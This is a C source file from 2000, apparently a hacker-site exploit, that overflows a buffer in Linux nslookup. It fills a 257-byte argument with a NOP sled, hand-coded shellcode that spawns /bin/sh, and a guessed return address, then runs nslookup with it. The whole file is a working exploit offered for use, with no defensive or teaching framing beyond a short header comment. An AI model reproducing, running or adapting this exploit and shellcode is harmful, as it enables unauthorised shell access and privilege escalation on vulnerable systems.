/* (linux)nslookup buffer overflow by: v9.  smaller/cleaner program of
   lore's ns.c.  shellcode is also from ns.c(with some modifications/fixes).
   note: i just made this cause i didn't like the original. i don't think it is
   SUID anywheres by default with any distribution, it would be usless to be. */

static char exec[]=
  "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89"
  "\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9"
  "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
long esp(void)
{
  __asm__("movl %esp,%eax");
}
int main(int argc,char **argv)
{
  char bof[257];
  int i,offset;
  long ret;
  if(argc>1)
    {
      offset=atoi(argv[1]);
    }
  ret=(esp()-offset);
  printf("return address: 0x%lx",ret);
  if(offset)
    {
      printf(", offset: %d",offset);
    }
  printf(".\n");
  for(i=0;i<257;i+=4)
    {
      *(long *)&bof[i]=ret;
    }
  for(i=0;i<(257-strlen(exec));i++)
    {
      *(bof+i)=0x90;
    }
  memcpy(bof+i,exec,strlen(exec));
  execlp("/usr/bin/nslookup","nslookup",bof,0);
}
/*                    www.hack.co.za           [27 June 2000]*/